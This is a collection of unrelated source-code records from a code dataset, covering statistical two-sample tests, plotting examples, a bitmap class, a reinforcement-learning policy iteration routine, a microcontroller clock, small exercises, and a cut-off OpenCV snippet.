TEMP = MMDu(Fea, N1, Fea_org, sigma, sigma0, ep, is_smooth)\r\n mmd_value = get_item(TEMP[0], is_cuda)\r\n Kxyxy = TEMP[2]\r\n count = 0\r\n nxy = Fea.shape[0]\r\n nx = N1\r\n for r in range(N_per):\r\n # print r\r\n ind = np.random.choice(nxy, nxy, replace=False)\r\n # divide into new X, Y\r\n indx = ind[:nx]\r\n # print(indx)\r\n indy = ind[nx:]\r\n Kx = Kxyxy[np.ix_(indx, indx)]\r\n # print(Kx)\r\n Ky = Kxyxy[np.ix_(indy, indy)]\r\n Kxy = Kxyxy[np.ix_(indx, indy)]\r\n\r\n TEMP = h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed=False)\r\n mmd_vector[r] = TEMP[0]\r\n if mmd_vector[r] > mmd_value:\r\n count = count + 1\r\n if count > np.ceil(N_per * alpha):\r\n h = 0\r\n threshold = \"NaN\"\r\n break\r\n else:\r\n h = 1\r\n if h == 1:\r\n S_mmd_vector = np.sort(mmd_vector)\r\n # print(np.int(np.ceil(N_per*alpha)))\r\n threshold = S_mmd_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n return h, threshold, mmd_value.item()\r\n\r\ndef TST_MMD_u_linear_kernel(Fea, N_per, N1, alpha, device, dtype):\r\n \"\"\"run two-sample test (TST) using (deep) lineaer kernel kernel.\"\"\"\r\n mmd_vector = np.zeros(N_per)\r\n TEMP = MMDu_linear_kernel(Fea, N1)\r\n mmd_value = get_item(TEMP[0], is_cuda)\r\n Kxyxy = TEMP[2]\r\n count = 0\r\n nxy = Fea.shape[0]\r\n nx = N1\r\n\r\n for r in range(N_per):\r\n # print r\r\n ind = np.random.choice(nxy, nxy, replace=False)\r\n # divide into new X, Y\r\n indx = ind[:nx]\r\n # print(indx)\r\n indy = ind[nx:]\r\n Kx = Kxyxy[np.ix_(indx, indx)]\r\n # print(Kx)\r\n Ky = Kxyxy[np.ix_(indy, indy)]\r\n Kxy = Kxyxy[np.ix_(indx, indy)]\r\n\r\n TEMP = h1_mean_var_gram(Kx, Ky, Kxy, is_var_computed=False)\r\n mmd_vector[r] = TEMP[0]\r\n if mmd_vector[r] > mmd_value:\r\n count = count + 1\r\n if count > np.ceil(N_per * alpha):\r\n h = 0\r\n threshold = \"NaN\"\r\n break\r\n else:\r\n h = 1\r\n if h == 1:\r\n S_mmd_vector = np.sort(mmd_vector)\r\n # print(np.int(np.ceil(N_per*alpha)))\r\n threshold = S_mmd_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n return h, threshold, mmd_value.item()\r\n\r\ndef TST_C2ST(S,N1,N_per,alpha,model_C2ST, w_C2ST, b_C2ST,device,dtype):\r\n \"\"\"run C2ST-S on non-image datasets.\"\"\"\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = f(model_C2ST(S).mm(w_C2ST) + b_C2ST)\r\n pred_C2ST = output.max(1, keepdim=True)[1]\r\n STAT = abs(pred_C2ST[:N1].type(torch.FloatTensor).mean() - pred_C2ST[N1:].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n # print(indx)\r\n STAT_vector[r] = abs(pred_C2ST[ind_X].type(torch.FloatTensor).mean() - pred_C2ST[ind_Y].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n threshold_lower = S_vector[np.int(np.ceil(N_per * alpha))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n # if STAT.item() < threshold_lower:\r\n # h = 1\r\n return h, threshold, STAT\r\n\r\ndef TST_LCE(S,N1,N_per,alpha,model_C2ST, w_C2ST, b_C2ST, device,dtype):\r\n \"\"\"run C2ST-L on non-image datasets.\"\"\"\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = f(model_C2ST(S).mm(w_C2ST) + b_C2ST)\r\n # pred_C2ST = output.max(1, keepdim=True)[1]\r\n STAT = abs(output[:N1,0].type(torch.FloatTensor).mean() - output[N1:,0].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n # print(indx)\r\n STAT_vector[r] = abs(output[ind_X,0].type(torch.FloatTensor).mean() - output[ind_Y,0].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n threshold_lower = S_vector[np.int(np.ceil(N_per * alpha))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n return h, threshold, STAT\r\n\r\ndef TST_ME(Fea, N1, alpha, is_train, test_locs, gwidth, J = 1, seed = 15):\r\n \"\"\"run ME test.\"\"\"\r\n Fea = get_item(Fea,is_cuda)\r\n tst_data = data.TSTData(Fea[0:N1,:], Fea[N1:,:])\r\n h = 0\r\n if is_train:\r\n op = {\r\n 'n_test_locs': J, # number of test locations to optimize\r\n 'max_iter': 300, # maximum number of gradient ascent iterations\r\n 'locs_step_size': 1.0, # step size for the test locations (features)\r\n 'gwidth_step_size': 0.1, # step size for the Gaussian width\r\n 'tol_fun': 1e-4, # stop if the objective does not increase more than this.\r\n 'seed': seed + 5, # random seed\r\n }\r\n test_locs, gwidth, info = tst.MeanEmbeddingTest.optimize_locs_width(tst_data, alpha, **op)\r\n return test_locs, gwidth\r\n else:\r\n met_opt = tst.MeanEmbeddingTest(test_locs, gwidth, alpha)\r\n test_result = met_opt.perform_test(tst_data)\r\n if test_result['h0_rejected']:\r\n h = 1\r\n return h\r\n\r\ndef TST_SCF(Fea, N1, alpha, is_train, test_freqs, gwidth, J = 1, seed = 15):\r\n \"\"\"run SCF test.\"\"\"\r\n Fea = get_item(Fea,is_cuda)\r\n tst_data = data.TSTData(Fea[0:N1,:], Fea[N1:,:])\r\n h = 0\r\n if is_train:\r\n op = {'n_test_freqs': J, 'seed': seed, 'max_iter': 300,\r\n 'batch_proportion': 1.0, 'freqs_step_size': 0.1,\r\n 'gwidth_step_size': 0.01, 'tol_fun': 1e-4}\r\n test_freqs, gwidth, info = tst.SmoothCFTest.optimize_freqs_width(tst_data, alpha, **op)\r\n return test_freqs, gwidth\r\n else:\r\n scf_opt = tst.SmoothCFTest(test_freqs, gwidth, alpha=alpha)\r\n test_result = scf_opt.perform_test(tst_data)\r\n if test_result['h0_rejected']:\r\n h = 1\r\n return h\r\n\r\ndef TST_C2ST_D(S,N1,N_per,alpha,discriminator,device,dtype):\r\n \"\"\"run C2ST-S on MNIST and CIFAR datasets.\"\"\"\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = discriminator(S)\r\n pred_C2ST = output.max(1, keepdim=True)[1]\r\n STAT = abs(pred_C2ST[:N1].type(torch.FloatTensor).mean() - pred_C2ST[N1:].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n STAT_vector[r] = abs(pred_C2ST[ind_X].type(torch.FloatTensor).mean() - pred_C2ST[ind_Y].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n threshold_lower = S_vector[np.int(np.ceil(N_per * alpha))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n return h, threshold, STAT\r\n\r\ndef TST_LCE_D(S,N1,N_per,alpha,discriminator,device,dtype):\r\n \"\"\"run C2ST-L on MNIST and CIFAR datasets.\"\"\"\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = discriminator(S)\r\n STAT = abs(output[:N1,0].type(torch.FloatTensor).mean() - output[N1:,0].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n # print(indx)\r\n STAT_vector[r] = abs(output[ind_X,0].type(torch.FloatTensor).mean() - output[ind_Y,0].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n return h, threshold, STAT\r\n\r\ndef TST_ME_DK(X, Y, T, X_org, Y_org, T_org, alpha, sigma, sigma0, epsilon, flag_debug = False):\r\n \"\"\"run deep-kernel ME test (using chi^2 to confirm the threshold) on CIFAR datasets (this code does not work).\"\"\"\r\n J = T.shape[0]\r\n s = compute_ME_stat(X, Y, T, X_org, Y_org, T_org, sigma, sigma0, epsilon)\r\n pvalue = stats.chi2.sf(s.item(), J)\r\n if pvalue threshold:\r\n h = 1\r\n return h, threshold, s","sub_path":"utils_HD.py","file_name":"utils_HD.py","file_ext":"py","file_size_in_byte":20457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"253535132","text":"import sys, json\n\n# Path to the monster json file.\nfilename = sys.argv[-1]\n\nwith open(filename, 'r') as data_file:\n data = json.load(data_file)\n\n# We don't really need to care about the monster/creature objects themselves as\n# the API POST /monster endpoint can set these up just fine (minus licence at end).\n\nMonsters, Creatures, CreatureActions = [], [], []\n\n# just match on this key for now. At least it's better than using a hard-coded id from the db.\ncreatureActionTypes = {\"actions\", \"reactions\", \"legendary_actions\", \"special_abilities\"}\n\nMonsterID = 1\n\nfor eachMonster in data:\n if 'license' in eachMonster:\n continue\n\n # Create n creature action rows\n for actionSetType in creatureActionTypes:\n if actionSetType in eachMonster.keys():\n for action in eachMonster[actionSetType]:\n\n for eachKey in action.keys():\n if len(str(eachKey)) < 1:\n action[eachKey] = None\n\n CreatureActions.append({\n \"creature_action_type_name\" : actionSetType,\n \"creature_id\" : MonsterID,\n \"name\" : action['name'] if 'name' in action else None,\n \"desc\" : action['desc'] if 'desc' in action else None,\n \"attack_bonus\" : action['attack_bonus'] if 'attack_bonus' in action else None,\n \"damage_dice\" : action['damage_dice'] if 'damage_dice' in action else None,\n \"damage_bonus\" : action['damage_bonus'] if 'damage_bonus' in action else None,\n \"official\" : True\n })\n\n MonsterID += 1\n\n# stdout pipe to file -> curl to POST /api/creature-actions etc.\nprint(json.dumps(CreatureActions))\n","sub_path":"src/bin/adhoc/parse-monster-actions.py","file_name":"parse-monster-actions.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"349538956","text":"# allennlp evaluate /path/to/model.tar.gz --evaluation-data-file (https://s3-us-west-1.amazonaws.com/handsomezebra/public/Quora_question_pair_partition.zip)#Quora_question_pair_partition/test.tsv\n\nimport sys\nimport logging\nimport glob\nimport os\n\nfrom allennlp.commands import main\n\n# getting the last updated model\nfiles = list(filter(os.path.isfile, glob.glob(\"./output_*/model.tar.gz\")))\nfiles.sort(key=lambda x: os.path.getmtime(x))\nmodel_path = files[-1]\n\ntest_path = \"./tests/quora_test_sample.txt\"\n\n# Assemble the command into sys.argv\nsys.argv = [\n \"allennlp\", # command name, not used by main\n \"predict\",\n model_path,\n test_path,\n \"--include-package\", \"hznlp\",\n \"--predictor\", \"sentence_pair\",\n \"--cuda-device\", \"-1\"\n]\n\nlogging.basicConfig(level=logging.INFO)\n\nmain()","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"371639713","text":"#Code by Shreyank #Github-https://github.com/Shreyankkarjigi\n#problem\n'''\nWap to make a new string with the word \"The\" removed from the string\n\n\"This is the lion in the cage\"\n\n'''\n\nstring=\"This is the lion in the cage\"\n\n#safe side convert the string to lowercase\nstring.lower()\n#use replace function\nstring_new=string.replace(\"the\",\"\")\n\n#print the new string\n\nprint(string_new)\n\n\n\n'''\noutput\n\nThis is lion in cage\n'''","sub_path":"Problems on Strings/Wap to make a new string with the word removed from the string.py","file_name":"Wap to make a new string with the word removed from the string.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"390493495","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom __future__ import division, print_function\n\nimport math\nimport random\n\nimport numpy\n\n\nclass Bitmap(object):\n def __init__(self, size, bitwidth=32, array=None, members=None):\n \"\"\"\n :param size: number of bits\n :param bitwidth:\n :param array:\n :param members:\n :return:\n \"\"\"\n self.size = int(math.ceil(size))\n self.bitwidth = bitwidth\n if array is None:\n dtype = 'uint{}'.format(bitwidth)\n arrsize = int(numpy.ceil(size * 1. / bitwidth))\n self.array = numpy.zeros(arrsize, dtype=dtype)\n else:\n self.array = array\n if members:\n self.update(members)\n\n def _verify(self, bitmap):\n if self.size != bitmap.size:\n raise ValueError('cannot use a bitmap of different size')\n if self.bitwidth != bitmap.bitwidth:\n raise ValueError('cannot use a bitmap of different bitwidth')\n\n def add(self, integer):\n idx = int(integer / self.bitwidth)\n self.array[idx] |= 1 << (integer % self.bitwidth)\n\n def __contains__(self, integer):\n idx = int(integer / self.bitwidth)\n return self.array[idx] & (1 << (integer % self.bitwidth))\n\n def update(self, collection):\n if isinstance(collection, Bitmap):\n self._verify(collection)\n self.array |= collection.array\n return\n for integer in collection:\n self.add(integer)\n\n def union(self, collction):\n this = self.copy()\n this.update(collction)\n return this\n\n def intersection_update(self, collection):\n if not isinstance(collection, Bitmap):\n that = self.metacopy()\n that.update(collection)\n else:\n that = collection\n self.array &= that.array\n\n def intersection(self, collection):\n this = self.copy()\n this.intersection_update(collection)\n return this\n\n def difference_update(self, collection):\n if not isinstance(collection, Bitmap):\n that = self.metacopy()\n that.update(collection)\n else:\n that = collection\n self.intersection_update(-that)\n\n def difference(self, collection):\n this = self.copy()\n this.difference_update(collection)\n return this\n\n def clear(self):\n self.array[:] = 0\n return self\n\n def copy(self):\n array = self.array.copy()\n return Bitmap(self.size, self.bitwidth, array=array)\n\n def metacopy(self):\n array = numpy.zeros_like(self.array)\n return Bitmap(self.size, self.bitwidth, array=array)\n\n def __neg__(self):\n array = ~ self.array\n return Bitmap(self.size, self.bitwidth, array=array)\n\n def __iter__(self):\n for plane in self._iter_bit_planes(False):\n for i in plane:\n yield i\n\n def get_members(self, count=None, random_start=False):\n members = []\n for plane in self._iter_bit_planes(random_start):\n members.extend(plane)\n if len(members) >= count:\n break\n return members\n\n def pick(self):\n for plane in self._iter_bit_planes(random_start=True):\n members = plane.tolist()\n if members:\n return random.choice(members)\n\n def _iter_bit_planes(self, random_start):\n start = random.randrange(self.bitwidth) if random_start else 0\n for j in [(i + start) % self.bitwidth for i in range(self.bitwidth)]:\n for arr in numpy.nonzero(self.array & numpy.array([1 << j])):\n # arr: indexes with bit 1 on j-th bit\n yield numpy.array([j]) + arr * self.bitwidth\n\n @classmethod\n def test_bitmap(cls):\n bm = cls(1001)\n items = [1, 34, 555, 90]\n for i in range(1001):\n assert i not in bm\n bm.update(items)\n for i in range(1001):\n if i in items:\n assert i in bm\n else:\n assert i not in bm\n return bm\n","sub_path":"joker/binary/bitmap.py","file_name":"bitmap.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"581838674","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport plotly\n\nfrom plotly.subplots import make_subplots\n\nplotly.__version__\n\n\n# ***See Returns.ipynb for an example of using plotly with pandas Series and DataFrames***\n\n# ***Reading https://plot.ly/python/creating-and-updating-figures/ is worthwhile***\n\n# ## Simple example\n\n# In[2]:\n\n\nimport plotly\nimport plotly.graph_objs as go\n\n\ntrace0 = go.Scatter(\n x=[1, 2, 3, 4],\n y=[10, 15, 13, 17]\n)\ntrace1 = go.Scatter(\n x=[1, 2, 3, 4],\n y=[16, 5, 11, 9]\n)\ndata = [trace0, trace1]\n\ngo.Figure(data).show()\n\n\n# ## Wrapping matplotlib\n\n# In[3]:\n\n\n\n\n# Matplotlib\nimport matplotlib.pyplot as plt\nimport plotly.tools as tls\n\n## Generating the data..\nx = np.linspace(-2*np.pi, 2*np.pi, 1000)\n\n\nfig = plt.figure() # Initiate a figure\n\na1 = fig.add_subplot(221) # Figure has 1 row 1 column ; choose the first subplot\na1.plot(x,np.sin(x)) # Plot x and y in the chosen subplot\na1.grid()\n\na2 = fig.add_subplot(224)\na2.plot(x,np.cos(x))\na2.grid()\n\n\n# In[4]:\n\n\n# Now we make the matplotlib figure interactive using plotly\n\nplotly_fig = tls.mpl_to_plotly(fig)\n\nplotly_fig.show()\n\n\n# ## Plotting columns of a DataFrame\n\n# In[5]:\n\n\ndef PlotData(df):\n pdata = [{'x':df.index,'y':df[col],'name':col} for col in df.columns]\n return(pdata)\n\n\n# In[6]:\n\n\nETFRets = pd.read_pickle('/home/vpoduri/Site/ETFRets.pkl')\nETFRets.head()\n\n\n# In[7]:\n\n\n# Plotting\npdata = PlotData(ETFRets)\nlayout = go.Layout(title = 'ETF Returns',yaxis=dict(tickformat='.1%',title='Return'))\n\npFig = go.Figure(pdata,layout) # creates a Figure object\npFig.show()\n\n\n# ## Elaborate subplots\n\n# In[8]:\n\n\n# Rolling Correlations\nRCorr = ETFRets.rolling(12).corr(pairwise=True) # Really nice syntax!\n\nnr = 2 ; nc = 4\nfig = make_subplots(rows=nr, cols=nc, start_cell=\"top-left\",\n subplot_titles=list(RCorr.columns))\n\n\n# In[9]:\n\n\nfoo = RCorr.reset_index().rename(columns={\"level_1\":\"ETF\"})\nfoo.head(10)\n\n\n# In[10]:\n\n\n# Visualization with subplots. Quite finicky.\nETFList = foo.columns[2:]\n\nfor j in range(len(ETFList)):\n ticker = ETFList[j]\n df1 = foo.loc[foo[\"ETF\"]==ticker,:]\n df1 = df1.drop(columns=[\"ETF\",ticker]) # All values are 1\n \n fr,fc = np.unravel_index(j,(nr,nc),order='F') # Calculates subplot index, Fortran style (column major order)\n \n plines = [go.Scatter(x=df1[\"Date\"],y=df1[col],name=col) for col in ETFList.difference([ticker])]\n _=[fig.append_trace(pl,row=int(fr+1),col=int(fc+1)) for pl in plines]\n \n # only append_trace seems to do the trick with subplots\n # np.int64 for row and col cause errors, so have to use int\n \nfig.show()\n\n\n# ## plotly express\n\n# Plotly express was inspired by ggplot and Seaborn. It is a wrapper around lower-level classes and methods. It works best if the data are in a long form DataFrame. \n# \n# See its [tutorial](https://plot.ly/python/plotly-express/) for details.\n\n# In[11]:\n\n\nimport plotly.express as px\n\nRC2 = RCorr.reset_index().rename(columns={'level_1':'ETF'})\nRC2 = pd.melt(RC2,id_vars=['Date','ETF'],var_name='With',value_name='Corr')\n\npx.line(RC2,x='Date',y='Corr',color='With',facet_col='ETF',facet_col_wrap=4) # Remarkably elegant\n\n\n# In[48]:\n\n\nRC2.head()\n\n","sub_path":"Using_plotly.py","file_name":"Using_plotly.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"93692685","text":"import numpy as np\r\nimport sys\r\nimport os\r\n\r\nclass policy_iteration:\r\n def __init__(self, environment, max_iter=None):\r\n self.envonment = environment\r\n if max_iter is None:\r\n self.max_iter = np.iinfo(np.int32).max\r\n else:\r\n self.max_iter = max_iter\r\n self.d_idx = None\r\n self.V = np.zeros(len(self.envonment.states))\r\n self.total_iter = 0\r\n\r\n def get_optimal_policy(self):\r\n return self.envonment.get_policy(self.envonment.policies[self.d_idx])\r\n\r\n def evaluate_policy(self):\r\n print('[policy evaluation]')\r\n if self.d_idx is None:\r\n self.d_idx = 0\r\n policy = self.envonment.policies[self.d_idx]\r\n I = np.eye(len(self.envonment.states))\r\n transition_prob = self.envonment.get_transition_prob(policy)\r\n self.V = np.linalg.inv(I - self.envonment.discount_factor * transition_prob)\r\n self.V = np.matmul(self.V, self.envonment.get_reward(policy))\r\n print('V:', self.V, end='\\n\\n')\r\n\r\n def improve_policy(self):\r\n print('[policy improvement]')\r\n values = []\r\n for i, policy in enumerate(self.envonment.policies):\r\n values.append(list(self.envonment.get_reward(policy) + self.envonment.discount_factor * np.matmul(self.envonment.get_transition_prob(policy), self.V)))\r\n self.d_idx = np.argmax(np.sum(values, axis=-1))\r\n print('values:', values, '\\n' +\\\r\n 'new policy:', self.envonment.get_policy(self.envonment.policies[self.d_idx]), end='\\n\\n')\r\n\r\n def fit(self, verbose=True):\r\n if verbose is False:\r\n temp = sys.stdout\r\n sys.stdout = open(os.devnull, 'w')\r\n for i in range(self.max_iter):\r\n print('[iter ' + str(i) + ']')\r\n self.total_iter = i\r\n prev_idx = self.d_idx\r\n self.evaluate_policy()\r\n self.improve_policy()\r\n if prev_idx == self.d_idx:\r\n print('[converged]')\r\n break\r\n if verbose is False:\r\n sys.stdout = temp\r\n","sub_path":"algorithms/policy_iteration.py","file_name":"policy_iteration.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195124558","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\n\nn=input('Digite n: ')\n\nl=[]\n\n#LISTA\nfor i in range(0,n,1):\n l.append(input('Digite um elemento: '))\n \n#PRIMEIROeULTIMO \nprint('%.2f' %l[0])\nprint('%.2f' %(l[len(l)-1]))\n\n#MEDIA\nsoma=0\n\nfor i in range(0,n,1):\n soma=(soma+l[i])\n \nmedia=((soma)/(len(l)))\nprint('%.2f' %media)\n\n#LISTA\nprint(l)\n \n","sub_path":"moodledata/vpl_data/43/usersdata/65/14278/submittedfiles/mediaLista.py","file_name":"mediaLista.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"176328485","text":"from py_irt.initializers import DifficultySignInitializer\nfrom py_irt.dataset import Dataset\nfrom py_irt.training import IrtModelTrainer\nfrom py_irt.config import IrtConfig\n\n\ndef test_parsing():\n config = IrtConfig(model_type=\"4pl\", initializers=[])\n # This loads the initializer, so is a fine test\n trainer = IrtModelTrainer(data_path=\"test_fixtures/minitest.jsonlines\", config=config)\n assert len(trainer._initializers) == 0\n\n config = IrtConfig(model_type=\"4pl\", initializers=[\"difficulty_sign\"])\n trainer = IrtModelTrainer(data_path=\"test_fixtures/minitest.jsonlines\", config=config)\n assert len(trainer._initializers) == 1\n assert isinstance(trainer._initializers[0], DifficultySignInitializer)\n\n config = IrtConfig(\n model_type=\"4pl\", initializers=[{\"name\": \"difficulty_sign\", \"magnitude\": 5.0}]\n )\n trainer = IrtModelTrainer(data_path=\"test_fixtures/minitest.jsonlines\", config=config)\n assert len(trainer._initializers) == 1\n assert isinstance(trainer._initializers[0], DifficultySignInitializer)\n assert trainer._initializers[0]._magnitude == 5.0\n","sub_path":"tests/test_initializer.py","file_name":"test_initializer.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"589961943","text":"import board\nimport terminalio\nimport displayio\nimport math\nimport time\nimport rtc\nfrom adafruit_st7789 import ST7789\nimport network\n\n# Release any resources currently in use for the displays\ndisplayio.release_displays()\n\nspi = board.SPI()\ntft_cs = board.IO13\ntft_dc = board.IO14\n\ndisplay_bus = displayio.FourWire(\n spi, command=tft_dc, chip_select=tft_cs, reset=board.IO15)\ndisplay = ST7789(display_bus, width=320, height=240, rotation=90)\n\nmynet = network.Network()\nmynet.syncRTC_time()\n\n# Open the files\n# Setup the file as the bitmap data source\nzero = open(\"/zero.bmp\", \"rb\")\none = open(\"/one.bmp\", \"rb\")\ntwo = open(\"/two.bmp\", \"rb\")\nthree = open(\"/three.bmp\", \"rb\")\nfour = open(\"/four.bmp\", \"rb\")\nfive = open(\"/five.bmp\", \"rb\")\nsix = open(\"/six.bmp\", \"rb\")\nseven = open(\"/seven.bmp\", \"rb\")\neight = open(\"/eight.bmp\", \"rb\")\nnine = open(\"/nine.bmp\", \"rb\")\n\n\nclass numbers:\t\n def __init__(self, val, name):\n self.fname = name\n self.width = val\n self.file = displayio.OnDiskBitmap(name)\n \n def get_name(self):\n return self.fname\t\n \n def get_width(self):\n return self.width\n \n def get_file(self):\n return self.file\n \n\ndef pickSprite(num, dig, width):\n sprite = displayio.TileGrid(num, pixel_shader=displayio.ColorConverter(),\n width = 1,\n height = 1,\n tile_width = width,\n tile_height = 224,\n default_tile = 0,x=dig, y=0)\n return sprite\n \n\ndef truncate(n, decimals=0):\n multiplier = 10 ** decimals\n return math.floor(int(n * multiplier) / multiplier)\n \n\n \nzero = numbers(157, zero)\none = numbers(150, one)\ntwo = numbers(155, two)\nthree = numbers(158, three)\nfour = numbers(152, four)\nfive = numbers(153, five)\nsix = numbers(156, six)\nseven = numbers(160, seven)\neight = numbers(160, eight)\nnine = numbers(148, nine)\n\n\nboardRTC = rtc.RTC()\n\n# Main Loop\nwhile True:\n display.refresh()\n clockTime = boardRTC.datetime\n \n fdig = clockTime.tm_min % 10\n sdig = truncate(clockTime.tm_min / 10)\n\n\n # Create a Group to hold the TileGrid\n group = displayio.Group()\n \n if fdig == 0:\n group.append(pickSprite(zero.get_file(), 160, zero.get_width()))\n \n if fdig == 1:\n group.append(pickSprite(one.get_file(), 160, one.get_width()))\n \n if fdig == 2:\n group.append(pickSprite(two.get_file(), 160, two.get_width()))\n \n if fdig == 3:\n group.append(pickSprite(three.get_file(), 160, three.get_width()))\n \n if fdig == 4:\n group.append(pickSprite(four.get_file(), 160, four.get_width()))\n\n if fdig == 5:\n group.append(pickSprite(five.get_file(), 160, five.get_width()))\n \n if fdig == 6:\n group.append(pickSprite(six.get_file(), 160, six.get_width()))\n \n if fdig == 7:\n group.append(pickSprite(seven.get_file(), 160, seven.get_width()))\n \n if fdig == 8:\n group.append(pickSprite(eight.get_file(), 160, eight.get_width()))\n \n if fdig == 9:\n group.append(pickSprite(nine.get_file(), 160, nine.get_width()))\n \n \n if sdig == 0:\n group.append(pickSprite(zero.get_file(), 0, zero.get_width()))\n \n if sdig == 1:\n group.append(pickSprite(one.get_file(), 0, one.get_width()))\n \n if sdig == 2:\n group.append(pickSprite(two.get_file(), 0, two.get_width()))\n \n if sdig == 3:\n group.append(pickSprite(three.get_file(), 0, three.get_width()))\n \n if sdig == 4:\n group.append(pickSprite(four.get_file(), 0, four.get_width()))\n\n if sdig == 5:\n group.append(pickSprite(five.get_file(), 0, five.get_width()))\n \n if sdig == 6:\n group.append(pickSprite(six.get_file(), 0, six.get_width()))\n \n if sdig == 7:\n group.append(pickSprite(seven.get_file(), 0, seven.get_width()))\n \n if sdig == 8:\n group.append(pickSprite(eight.get_file(), 0, eight.get_width()))\n \n if sdig == 9:\n group.append(pickSprite(nine.get_file(), 0, nine.get_width()))\n\n # Add the Group to the Display\n display.show(group)\n\n \n \n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"93102003","text":"import random\n\nrandom_number = random.randint(1, 100)\nprint(random_number)\n\ntakes = 7\n\nprint(\"Guess the number from 1 to 100, you have 7 takes!\")\n\nwhile takes > 0:\n\n takes -= 1\n guess = int(input(\"Your number: \"))\n\n if random_number == guess:\n print(\"You're god damn right!\")\n break\n\n else:\n\n if random_number > guess:\n print(\"Number too low\")\n else:\n print(\"Number too high\")\n\n print(\"Loser!\")\n","sub_path":"number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"465142385","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom store_json import store_json\nimport sys\nimport os\nsys.path.append('../')\nfrom configuration import set_data_path\n\n\ndef localblacklist():\n\tdata_path = set_data_path()\n\tblacklist_dir = os.path.join(data_path,'local_Blacklist.txt')\n\twith open(blacklist_dir,'r') as f:\n\t\ttext = f.read()\n\ttext = text.split('\\n')[6:-1]\n\tret_dict = {}\n\tfor row in text:\n\t\trow = row.split(' ')\n\t\tret_dict[row[0]] = {\n\t\t\t'source' : row[1],\n\t\t\t'subtype' : row[2]\n\t\t}\n\treturn ret_dict\n\ndef main():\n\tret_dict = localblacklist()\n\tstore_json(ret_dict,'localblacklist')\n\n","sub_path":"project/get_blacklist/localblacklist.py","file_name":"localblacklist.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"1682376","text":"\nimport cv2 as cv\nimport numpy as np\nimport cv2\n# 读入图片\n\n# 转换成灰度图\ndef find_picture_location(frame):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # 二值化\n 